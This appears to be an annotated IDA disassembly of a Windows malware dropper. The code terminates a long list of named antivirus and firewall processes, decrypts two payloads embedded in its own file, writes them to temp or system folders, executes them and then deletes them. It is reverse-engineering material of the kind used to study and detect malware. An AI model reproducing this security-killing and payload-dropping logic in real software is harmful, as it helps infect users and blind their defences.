--------------------------------------------------------------------------- .text:00401688 .text:00401688 loc_401688: ; CODE XREF: WinMain(x,x,x,x)+57j .text:00401688 lea eax, [ebp+Buffer] .text:0040168E push esi ; uSize .text:0040168F push eax ; lpBuffer .text:00401690 call ds:GetSystemDirectoryA .text:00401696 jmp short loc_4016A6 ; buffer = .text:00401696 ; .text:00401698 ; --------------------------------------------------------------------------- .text:00401698 .text:00401698 loc_401698: ; CODE XREF: WinMain(x,x,x,x)+54j .text:00401698 lea eax, [ebp+Buffer] .text:0040169E push eax ; lpBuffer .text:0040169F push esi ; nBufferLength .text:004016A0 call ds:GetTempPathA ; buffer = .text:004016A6 .text:004016A6 loc_4016A6: ; CODE XREF: WinMain(x,x,x,x)+6Aj .text:004016A6 ; WinMain(x,x,x,x)+7Aj ... .text:004016A6 lea eax, [ebp+var_430] .text:004016AC push ebx .text:004016AD push eax ; char * .text:004016AE call tmpnam ; "" var_430 .text:004016AE ; .text:004016B3 lea eax, [ebp+var_12] .text:004016B6 mov esi, ds:wsprintfA .text:004016BC push eax .text:004016BD lea eax, [ebp+var_430] .text:004016C3 push eax .text:004016C4 lea eax, [ebp+Buffer] .text:004016CA push eax .text:004016CB mov ebx, offset aSSS ; "%s%s%s" .text:004016D0 lea eax, [ebp+FileName] .text:004016D6 push ebx ; LPCSTR .text:004016D7 push eax ; LPSTR .text:004016D8 call esi ; wsprintfA ; wsprintf(Filename,"%s%s%s",Buffer,var_430,var_12) .text:004016D8 ; Filename=Buffer+var_430+var_12 .text:004016DA lea eax, [ebp+var_430] .text:004016E0 push eax ; char * .text:004016E1 call tmpnam ; "" var_430 .text:004016E1 ; .text:004016E6 lea eax, [ebp+var_D] .text:004016E9 push eax .text:004016EA lea eax, [ebp+var_430] .text:004016F0 push eax .text:004016F1 lea eax, [ebp+Buffer] .text:004016F7 push eax .text:004016F8 lea eax, [ebp+var_32C] .text:004016FE push ebx ; LPCSTR .text:004016FF push eax ; LPSTR .text:00401700 call esi ; wsprintfA ; var_32C=Buffer+var430+var_D .text:00401700 ; .text:00401702 push 4 .text:00401704 push [ebp+var_18] .text:00401707 call sub_4015F8 ; ?? .text:0040170C add esp, 38h .text:0040170F test eax, eax .text:00401711 jz short loc_401718 .text:00401713 call sub_401488 ; KillProcess1 .text:00401718 .text:00401718 loc_401718: ; CODE XREF: WinMain(x,x,x,x)+105j .text:00401718 push 5 .text:0040171A push [ebp+var_18] .text:0040171D call sub_4015F8 ; ?? .text:00401722 pop ecx .text:00401723 test eax, eax .text:00401725 pop ecx .text:00401726 jz short loc_40172D .text:00401728 call sub_401540 ; KillProcess2 .text:0040172D .text:0040172D loc_40172D: ; CODE XREF: WinMain(x,x,x,x)+11Aj .text:0040172D mov esi, offset aWb ; "wb" .text:00401732 lea eax, [ebp+FileName] .text:00401738 push esi ; char * .text:00401739 push eax ; char * .text:0040173A call fopen .text:0040173F mov [ebp+var_8], eax ; var_8=fopen(Filename,"wb"); - .text:0040173F ; .text:0040173F ; .text:00401742 lea eax, [ebp+var_32C] .text:00401748 push esi ; char * .text:00401749 push eax ; char * .text:0040174A call fopen .text:0040174F push 2 .text:00401751 mov [ebp+var_4], eax ; var_4=fopen(var_32C,"wb") .text:00401751 ; .text:00401751 ; .text:00401754 push [ebp+var_18] .text:00401757 xor ebx, ebx .text:00401759 xor esi, esi .text:0040175B call sub_4015F8 ; ?? .text:00401760 push 2 ; int .text:00401762 push 0FFFFFFE8h .text:00401764 mov [ebp+hModule], eax .text:00401767 pop eax .text:00401768 sub eax, [ebp+var_1C] .text:0040176B sub eax, [ebp+var_20] .text:0040176E push eax ; __int32 .text:0040176F push edi ; FILE * .text:00401770 call fseek .text:00401775 add esp, 24h .text:00401778 .text:00401778 loc_401778: ; CODE XREF: WinMain(x,x,x,x)+188j .text:00401778 push edi ; Decrypt1 .text:00401779 call fgetc .text:0040177E push [ebp+var_8] ; FILE * .text:00401781 movsx eax, al .text:00401784 sub eax, [ebp+hModule] .text:00401787 push eax ; int .text:00401788 call fputc .text:0040178D add esp, 0Ch .text:00401790 inc esi .text:00401791 cmp esi, [ebp+var_20] .text:00401794 jl short loc_401778 .text:00401796 push 2 ; int .text:00401798 push 0FFFFFFE8h .text:0040179A pop eax .text:0040179B sub eax, [ebp+var_1C] .text:0040179E push eax ; __int32 .text:0040179F push edi ; FILE * .text:004017A0 call fseek .text:004017A5 add esp, 0Ch .text:004017A8 xor esi, esi .text:004017AA .text:004017AA loc_4017AA: ; CODE XREF: WinMain(x,x,x,x)+1BAj .text:004017AA push edi ; Decrypt2 .text:004017AB call fgetc .text:004017B0 push [ebp+var_4] ; FILE * .text:004017B3 movsx eax, al .text:004017B6 sub eax, [ebp+hModule] .text:004017B9 push eax ; int .text:004017BA call fputc .text:004017BF add esp, 0Ch .text:004017C2 inc esi .text:004017C3 cmp esi, [ebp+var_1C] .text:004017C6 jl short loc_4017AA .text:004017C8 push [ebp+var_8] ; FILE * .text:004017CB call fclose .text:004017D0 push [ebp+var_4] ; FILE * .text:004017D3 call fclose .text:004017D8 push edi ; FILE * .text:004017D9 call fclose .text:004017DE push ebx .text:004017DF push [ebp+var_18] .text:004017E2 call sub_4015F8 .text:004017E7 mov esi, ds:ShellExecuteA ; Opens or prints a specified file .text:004017ED add esp, 14h .text:004017F0 test eax, eax .text:004017F2 jz short loc_401803 .text:004017F4 push 0Ah ; nShowCmd .text:004017F6 push ebx ; lpDirectory .text:004017F7 lea eax, [ebp+FileName] .text:004017FD push ebx ; lpParameters .text:004017FE push eax ; lpFile .text:004017FF push ebx ; lpOperation .text:00401800 push ebx ; hwnd .text:00401801 call esi ; ShellExecuteA ; FileName .text:00401803 .text:00401803 loc_401803: ; CODE XREF: WinMain(x,x,x,x)+1E6j .text:00401803 push 1 .text:00401805 push [ebp+var_18] .text:00401808 call sub_4015F8 .text:0040180D pop ecx .text:0040180E test eax, eax .text:00401810 pop ecx .text:00401811 jz short loc_401822 .text:00401813 push 0Ah ; nShowCmd .text:00401815 push ebx ; lpDirectory .text:00401816 lea eax, [ebp+var_32C] .text:0040181C push ebx ; lpParameters .text:0040181D push eax ; lpFile .text:0040181E push ebx ; lpOperation .text:0040181F push ebx ; hwnd .text:00401820 call esi ; ShellExecuteA ; var_32C .text:00401822 .text:00401822 loc_401822: ; CODE XREF: WinMain(x,x,x,x)+205j .text:00401822 push 1388h ; dwMilliseconds .text:00401827 call ds:Sleep .text:0040182D push 3 .text:0040182F push [ebp+var_18] .text:00401832 call sub_4015F8 .text:00401837 mov esi, ds:DeleteFileA .text:0040183D pop ecx .text:0040183E pop ecx .text:0040183F pop ebx .text:00401840 test eax, eax .text:00401842 jz short loc_40184D .text:00401844 lea eax, [ebp+FileName] .text:0040184A push eax ; lpFileName .text:0040184B call esi ; DeleteFileA ; FileName .text:0040184D .text:0040184D loc_40184D: ; CODE XREF: WinMain(x,x,x,x)+236j .text:0040184D push 3 .text:0040184F push [ebp+var_18] .text:00401852 call sub_4015F8 .text:00401857 pop ecx .text:00401858 test eax, eax .text:0040185A pop ecx .text:0040185B jz short loc_401866 .text:0040185D lea eax, [ebp+var_32C] .text:00401863 push eax ; lpFileName .text:00401864 call esi ; DeleteFileA ; var_32C .text:00401866 .text:00401866 loc_401866: ; CODE XREF: WinMain(x,x,x,x)+24Fj .text:00401866 pop edi .text:00401867 xor eax, eax .text:00401869 pop esi .text:0040186A leave .text:0040186B retn 10h .text:0040186B _WinMain@16 endp .text:0040186B .text:0040186E ; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND] .text:00401874 ; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND] .text:0040187A ; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND] .text:00401880 ; [00000006 BYTES: COLLAPSED FUNCTION strstr. PRESS KEYPAD "+" TO EXPAND] .text:00401886 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND] .text:0040188C ; [00000006 BYTES: COLLAPSED FUNCTION fputc. PRESS KEYPAD "+" TO EXPAND] .text:00401892 ; [00000006 BYTES: COLLAPSED FUNCTION fgetc. PRESS KEYPAD "+" TO EXPAND] .text:00401898 ; [00000006 BYTES: COLLAPSED FUNCTION tmpnam. PRESS KEYPAD "+" TO EXPAND] .text:0040189E ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND] .text:004018A4 ; [00000006 BYTES: COLLAPSED FUNCTION fseek. PRESS KEYPAD "+" TO EXPAND] .text:004018AA ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND] .text:004018B0 .text:004018B0 ; --------------- S U B R O U T I N E --------------------------------------- .text:004018B0 .text:004018B0 ; Attributes: library function bp-based frame .text:004018B0 .text:004018B0 public start .text:004018B0 start proc near .text:004018B0 .text:004018B0 var_74 = dword ptr -74h .text:004018B0 var_70 = dword ptr -70h .text:004018B0 var_6C = dword ptr -6Ch .text:004018B0 var_68 = dword ptr -68h .text:004018B0 var_64 = dword ptr -64h .text:004018B0 var_60 = dword ptr -60h .text:004018B0 StartupInfo = _STARTUPINFOA ptr -5Ch .text:004018B0 var_18 = dword ptr -18h .text:004018B0 var_4 = dword ptr -4 .text:004018B0 .text:004018B0 push ebp .text:004018B1 mov ebp, esp .text:004018B3 push 0FFFFFFFFh .text:004018B5 push offset dword_4010A8 .text:004018BA push offset loc_401A30 .text:004018BF mov eax, large fs:0 .text:004018C5 push eax .text:004018C6 mov large fs:0, esp .text:004018CD sub esp, 68h .text:004018D0 push ebx .text:004018D1 push esi .text:004018D2 push edi .text:004018D3 mov [ebp+var_18], esp .text:004018D6 xor ebx, ebx .text:004018D8 mov [ebp+var_4], ebx .text:004018DB push 2 .text:004018DD call ds:__set_app_type .text:004018E3 pop ecx .text:004018E4 or dword_4022A0, 0FFFFFFFFh .text:004018EB or dword_4022A4, 0FFFFFFFFh .text:004018F2 call ds:__p__fmode .text:004018F8 mov ecx, dword_40229C .text:004018FE mov [eax], ecx .text:00401900 call ds:__p__commode .text:00401906 mov ecx, dword_402298 .text:0040190C mov [eax], ecx .text:0040190E mov eax, ds:_adjust_fdiv .text:00401913 mov eax, [eax] .text:00401915 mov dword_4022A8, eax .text:0040191A call nullsub_1 .text:0040191F cmp dword_40228C, ebx .text:00401925 jnz short loc_401933 .text:00401927 push offset loc_401A2C .text:0040192C call ds:__setusermatherr .text:00401932 pop ecx .text:00401933 .text:00401933 loc_401933: ; CODE XREF: start+75j .text:00401933 call __setdefaultprecision .text:00401938 push offset unk_40200C .text:0040193D push offset unk_402008 .text:00401942 call _initterm .text:00401947 mov eax, dword_402294 .text:0040194C mov [ebp+var_6C], eax .text:0040194F lea eax, [ebp+var_6C] .text:00401952 push eax .text:00401953 push dword_402290 .text:00401959 lea eax, [ebp+var_64] .text:0040195C push eax .text:0040195D lea eax, [ebp+var_70] .text:00401960 push eax .text:00401961 lea eax, [ebp+var_60] .text:00401964 push eax .text:00401965 call ds:__getmainargs .text:0040196B push offset unk_402004 .text:00401970 push offset unk_402000 .text:00401975 call _initterm .text:0040197A add esp, 24h .text:0040197D mov eax, ds:_acmdln .text:00401982 mov esi, [eax] .text:00401984 mov [ebp+var_74], esi .text:00401987 cmp byte ptr [esi], 22h .text:0040198A jnz short loc_4019C6 .text:0040198C .text:0040198C loc_40198C: ; CODE XREF: start+E8j .text:0040198C inc esi .text:0040198D mov [ebp+var_74], esi .text:00401990 mov al, [esi] .text:00401992 cmp al, bl .text:00401994 jz short loc_40199A .text:00401996 cmp al, 22h .text:00401998 jnz short loc_40198C .text:0040199A .text:0040199A loc_40199A: ; CODE XREF: start+E4j .text:0040199A cmp byte ptr [esi], 22h .text:0040199D jnz short loc_4019A3 .text:0040199F .text:0040199F loc_40199F: ; CODE XREF: start+FBj .text:0040199F inc esi .text:004019A0 mov [ebp+var_74], esi .text:004019A3 .text:004019A3 loc_4019A3: ; CODE XREF: start+EDj .text:004019A3 ; start+119j .text:004019A3 mov al, [esi] .text:004019A5 cmp al, bl .text:004019A7 jz short loc_4019AD .text:004019A9 cmp al, 20h .text:004019AB jbe short loc_40199F .text:004019AD .text:004019AD loc_4019AD: ; CODE XREF: start+F7j .text:004019AD mov [ebp+StartupInfo.dwFlags], ebx .text:004019B0 lea eax, [ebp+StartupInfo] .text:004019B3 push eax ; lpStartupInfo .text:004019B4 call ds:GetStartupInfoA .text:004019BA test byte ptr [ebp+StartupInfo.dwFlags], 1 .text:004019BE jz short loc_4019D1 .text:004019C0 movzx eax, [ebp+StartupInfo.wShowWindow] .text:004019C4 jmp short loc_4019D4 .text:004019C6 ; --------------------------------------------------------------------------- .text:004019C6 .text:004019C6 loc_4019C6: ; CODE XREF: start+DAj .text:004019C6 ; start+11Fj .text:004019C6 cmp byte ptr [esi], 20h .text:004019C9 jbe short loc_4019A3 .text:004019CB inc esi .text:004019CC mov [ebp+var_74], esi .text:004019CF jmp short loc_4019C6 .text:004019D1 ; --------------------------------------------------------------------------- .text:004019D1 .text:004019D1 loc_4019D1: ; CODE XREF: start+10Ej .text:004019D1 push 0Ah .text:004019D3 pop eax .text:004019D4 .text:004019D4 loc_4019D4: ; CODE XREF: start+114j .text:004019D4 push eax ; nShowCmd .text:004019D5 push esi ; lpCmdLine .text:004019D6 push ebx ; hPrevInstance .text:004019D7 push ebx ; lpModuleName .text:004019D8 call ds:GetModuleHandleA .text:004019DE push eax ; hInstance .text:004019DF call _WinMain@16 ; WinMain(x,x,x,x) .text:004019E4 mov [ebp+var_68], eax .text:004019E7 push eax ; int .text:004019E8 call ds:exit .text:004019E8 start endp .text:004019E8 .text:004019EE ; --------------------------------------------------------------------------- .text:004019EE mov eax, [ebp-14h] .text:004019F1 mov ecx, [eax] .text:004019F3 mov ecx, [ecx] .text:004019F5 mov [ebp-78h], ecx .text:004019F8 push eax .text:004019F9 push ecx .text:004019FA call _XcptFilter .text:004019FF pop ecx .text:00401A00 pop ecx .text:00401A01 retn .text:00401A02 ; --------------------------------------------------------------------------- .text:00401A02 mov esp, [ebp-18h] .text:00401A05 push dword ptr [ebp-78h] .text:00401A08 call ds:_exit .text:00401A0E ; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND] .text:00401A14 ; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND] .text:00401A1A ; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND] .text:00401A2C ; --------------------------------------------------------------------------- .text:00401A2C .text:00401A2C loc_401A2C: ; DATA XREF: start+77o .text:00401A2C xor eax, eax .text:00401A2E retn .text:00401A2F ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] .text:00401A30 ; --------------------------------------------------------------------------- .text:00401A30 .text:00401A30 loc_401A30: ; DATA XREF: start+Ao .text:00401A30 jmp ds:_except_handler3 .text:00401A36 ; [00000006 BYTES: COLLAPSED FUNCTION _controlfp. PRESS KEYPAD "+" TO EXPAND] .text:00401A3C dd 3 dup(0) .text:00401A48 dd 1B48h, 1000h, 3 dup(0) .text:00401A5C dd 1B55h, 1040h, 3 dup(0) .text:00401A70 dd 1B60h, 1098h, 3 dup(0) .text:00401A84 dd 1B6Ch, 10A0h, 2Fh dup(0) .text:00401B48 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56534D00h, 2E545243h .text:00401B48 dd 6C6C64h, 4C454853h, 2E32334Ch, 6C6C64h, 52455355h, 642E3233h .text:00401B48 dd 6C6Ch, 704F0000h, 72506E65h, 7365636Fh, 73h, 736F6C43h .text:00401B48 dd 6E614865h, 656C64h, 72500000h, 7365636Fh, 4E323373h .text:00401B48 dd 747865h, 65540000h, 6E696D72h, 50657461h, 65636F72h .text:00401B48 dd 7373h, 636F7250h, 33737365h, 72694632h, 7473h .text:00401BC8 aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 .text:00401BE1 align 2 .text:00401BE2 aDeletefilea db 'DeleteFileA',0 .text:00401BEE align 10h .text:00401BF0 aSleep db 'Sleep',0 .text:00401BF6 align 4 .text:00401BF8 aGettemppatha db 'GetTempPathA',0 .text:00401C05 align 2 .text:00401C06 aGetsystemdirec db 'GetSystemDirectoryA',0 .text:00401C1A align 4 .text:00401C1C aGetwindowsdire db 'GetWindowsDirectoryA',0 .text:00401C31 align 2 .text:00401C32 aGetcurrentdire db 'GetCurrentDirectoryA',0 .text:00401C47 align 4 .text:00401C48 aGetmodulefilen db 'GetModuleFileNameA',0 .text:00401C5B align 4 .text:00401C5C aGetmodulehandl db 'GetModuleHandleA',0 .text:00401C6D align 2 .text:00401C6E aGetstartupinfo db 'GetStartupInfoA',0 .text:00401C7E align 10h .text:00401C80 a__getmainargs db '__getmainargs',0 .text:00401C8E align 10h .text:00401C90 aStrstr db 'strstr',0 .text:00401C97 align 4 .text:00401C98 aFclose db 'fclose',0 .text:00401C9F align 10h .text:00401CA0 aFputc db 'fputc',0 .text:00401CA6 align 4 .text:00401CA8 aFgetc db 'fgetc',0 .text:00401CAE align 10h .text:00401CB0 aFread db 'fread',0 .text:00401CB6 align 4 .text:00401CB8 aFseek db 'fseek',0 .text:00401CBE align 10h .text:00401CC0 aFopen db 'fopen',0 .text:00401CC6 align 4 .text:00401CC8 a_exit db '_exit',0 .text:00401CCE align 10h .text:00401CD0 a_xcptfilter db '_XcptFilter',0 .text:00401CDC dd 78650000h, 7469h, 6D63615Fh, 6E6C64h, 6D740000h, 6D616E70h .text:00401CDC dd 695F0000h, 7474696Eh, 6D7265h, 5F5F0000h, 75746573h .text:00401CDC dd 6D726573h, 65687461h, 7272h, 6A64615Fh, 5F747375h, 76696466h .text:00401CDC dd 5F5F0000h, 635F5F70h, 6F6D6D6Fh, 6564h, 5F705F5Fh, 6F6D665Fh .text:00401CDC dd 6564h, 65735F5Fh, 70615F74h, 79745F70h, 6570h, 6378655Fh .text:00401CDC dd 5F747065h, 646E6168h, 3372656Ch, 635F0000h, 72746E6Fh .text:00401CDC dd 70666C6Fh, 68530000h, 456C6C65h, 75636578h, 416574h .text:00401CDC dd 73770000h, 6E697270h, 416674h, 1Fh dup(0) .text:00401CDC _text ends .text:00401CDC .data:00402000 ; Section 2. (virtual address 00002000) .data:00402000 ; Virtual size : 000002AC ( 684.) .data:00402000 ; Section size in file : 00000400 ( 1024.) .data:00402000 ; Offset to raw data for section: 00001200 .data:00402000 ; Flags C0000040: Data Readable Writable .data:00402000 ; Alignment : default .data:00402000 ; =========================================================================== .data:00402000 .data:00402000 ; Segment type: Pure data .data:00402000 ; Segment permissions: Read/Write .data:00402000 _data segment para public 'DATA' use32 .data:00402000 assume cs:_data .data:00402000 ;org 402000h .data:00402000 unk_402000 db 0 ; DATA XREF: start+C0o .data:00402001 db 0 .data:00402002 db 0 .data:00402003 db 0 .data:00402004 unk_402004 db 0 ; DATA XREF: start+BBo .data:00402005 db 0 .data:00402006 db 0 .data:00402007 db 0 .data:00402008 unk_402008 db 0 ; DATA XREF: start+8Do .data:00402009 db 0 .data:0040200A db 0 .data:0040200B db 0 .data:0040200C unk_40200C db 0 ; DATA XREF: start+88o .data:0040200D db 0 .data:0040200E db 0 .data:0040200F db 0 .data:00402010 ; char aAvpcc_exe[] .data:00402010 aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: sub_4010C0+32Do .data:0040201A align 4 .data:0040201C ; char aAvkserv_exe[] .data:0040201C aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: sub_4010C0+31Co .data:00402028 ; char aEcengine_exe[] .data:00402028 aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: sub_4010C0+30Bo .data:00402035 align 4 .data:00402038 ; char aFpWin_exe[] .data:00402038 aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: sub_4010C0+2FAo .data:00402043 align 4 .data:00402044 ; char aVettray_exe[] .data:00402044 aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: sub_4010C0+2E9o .data:00402050 ; char aAckwin32_exe[] .data:00402050 aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: sub_4010C0+2D8o .data:0040205D align 10h .data:00402060 ; char aAvnt_exe[] .data:00402060 aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: sub_4010C0+2C7o .data:00402069 align 4 .data:0040206C ; char aEsafe_exe[] .data:0040206C aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: sub_4010C0+2B6o .data:00402076 align 4 .data:00402078 ; char aFprot_exe[] .data:00402078 aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: sub_4010C0+2A1o .data:00402082 align 4 .data:00402084 ; char aFProt95_exe[] .data:00402084 aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: sub_4010C0+28Co .data:00402091 align 4 .data:00402094 ; char aIomon98_exe[] .data:00402094 aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: sub_4010C0+277o .data:004020A0 ; char aAvwin95_exe[] .data:004020A0 aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: sub_4010C0+251o .data:004020AC ; char aAve32_exe[] .data:004020AC aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: sub_4010C0+23Co .data:004020B6 align 4 .data:004020B8 ; char aAntiTrojan_exe[] .data:004020B8 aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: sub_4010C0+227o .data:004020C8 ; char a_avpcc_exe[] .data:004020C8 a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: sub_4010C0+212o .data:004020D3 align 4 .data:004020D4 ; char aApvxdwin_exe[] .data:004020D4 aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: sub_4010C0+1FDo .data:004020E1 align 4 .data:004020E4 ; char aClaw95cf_exe[] .data:004020E4 aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: sub_4010C0+1E8o .data:004020F1 align 4 .data:004020F4 ; char a_findviru_exe[] .data:004020F4 a_findviru_exe db '_FINDVIRU.EXE',0 ; DATA XREF: sub_4010C0+1D3o .data:00402102 align 4 .data:00402104 ; char aFindviru_exe[] .data:00402104 aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: sub_4010C0+1BEo .data:00402111 align 4 .data:00402114 ; char aNavnt_exe[] .data:00402114 aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: sub_4010C0+1A9o .data:0040211E align 10h .data:00402120 ; char aVet95_exe[] .data:00402120 aVet95_exe db 'VET95.EXE',0 ; DATA XREF: sub_4010C0+194o .data:0040212A align 4 .data:0040212C ; char aScan32_exe[] .data:0040212C aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: sub_4010C0+17Fo .data:00402137 align 4 .data:00402138 ; char aRav7_exe[] .data:00402138 aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: sub_4010C0+16Ao .data:00402141 align 4 .data:00402144 ; char aNavapw32_exe[] .data:00402144 aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: sub_4010C0+155o .data:00402151 align 4 .data:00402154 ; char aVsmain_exe[] .data:00402154 aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: sub_4010C0+12Fo .data:0040215F align 10h .data:00402160 ; char aGuarddog_exe[] .data:00402160 aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: sub_4010C0+11Ao .data:0040216D align 10h .data:00402170 ; char aRulaunch_exe[] .data:00402170 aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: sub_4010C0+105o .data:0040217D align 10h .data:00402180 ; char aAlogserv_exe[] .data:00402180 aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: sub_4010C0+F0o .data:0040218D align 10h .data:00402190 ; char aOgrc_exe[] .data:00402190 aOgrc_exe db 'OGRC.EXE',0 ; DATA XREF: sub_4010C0+DAo .data:00402199 align 4 .data:0040219C ; char aNavapsvc_exe[] .data:0040219C aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: sub_4010C0+C5o .data:004021A9 align 4 .data:004021AC ; char aSmss_exe[] .data:004021AC aSmss_exe db 'SMSS.EXE',0 ; DATA XREF: sub_4010C0+B0o .data:004021B5 align 4 .data:004021B8 ; char aNsplugin_exe[] .data:004021B8 aNsplugin_exe db 'NSPLUGIN.EXE',0 ; DATA XREF: sub_4010C0+9Bo .data:004021C5 align 4 .data:004021C8 ; char aNod32_exe[] .data:004021C8 aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: sub_4010C0+86o .data:004021D2 align 4 .data:004021D4 ; char a_avpm_exe[] .data:004021D4 a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: sub_4010C0+71o .data:004021DE align 10h .data:004021E0 ; char aAmon_exe[] .data:004021E0 aAmon_exe db 'AMON.EXE',0 ; DATA XREF: sub_4010C0+5Co .data:004021E9 align 4 .data:004021EC ; char aNavwnt_exe[] .data:004021EC aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: sub_4010C0+46o .data:004021F7 align 4 .data:004021F8 ; char aNavw32_exe[] .data:004021F8 aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: sub_4010C0+31o .data:00402203 align 4 .data:00402204 ; char aSpider_exe[] .data:00402204 aSpider_exe db 'SPIDER.EXE',0 ; DATA XREF: sub_4010C0+1Co .data:0040220F align 10h .data:00402210 ; char aAvpm_exe[] .data:00402210 aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: sub_4010C0+7o .data:00402219 align 4 .data:0040221C ; char aAtguard_exe[] .data:0040221C aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: sub_401405+6Bo .data:00402228 ; char aBlackice_exe[] .data:00402228 aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: sub_401405+5Ao .data:00402235 align 4 .data:00402238 ; char aLookout_exe[] .data:00402238 aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: sub_401405+49o .data:00402244 ; char aCmgrdian_exe[] .data:00402244 aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: sub_401405+38o .data:00402251 align 4 .data:00402254 ; char aIamapp_exe[] .data:00402254 aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: sub_401405+27o .data:0040225F align 10h .data:00402260 ; char aOutpost_exe[] .data:00402260 aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: sub_401405+16o .data:0040226C ; char aZonalarm_exe[] .data:0040226C aZonalarm_exe db 'ZONALARM.EXE',0 ; DATA XREF: sub_401405+5o .data:00402279 align 4 .data:0040227C ; char aWb[] .data:0040227C aWb db 'wb',0 ; DATA XREF: WinMain(x,x,x,x):loc_40172Do .data:0040227F align 10h .data:00402280 ; char aSSS[] .data:00402280 aSSS db '%s%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+BFo .data:00402287 align 4 .data:00402288 ; char aRb[] .data:00402288 aRb db 'rb',0 ; DATA XREF: WinMain(x,x,x,x)+27o .data:0040228B align 4 .data:0040228C dword_40228C dd 1 ; DATA XREF: start+6Fr .data:00402290 dword_402290 dd 0 ; DATA XREF: start+A3r .data:00402294 dword_402294 dd 0 ; DATA XREF: start+97r .data:00402298 dword_402298 dd 0 ; DATA XREF: start+56r .data:0040229C dword_40229C dd 0 ; DATA XREF: start+48r .data:004022A0 dword_4022A0 dd 0 ; DATA XREF: start+34w .data:004022A4 dword_4022A4 dd 0 ; DATA XREF: start+3Bw .data:004022A8 dword_4022A8 dd 0 ; DATA XREF: start+65w .data:004022AC align 200h .data:004022AC _data ends .data:004022AC .data:004022AC .data:004022AC end start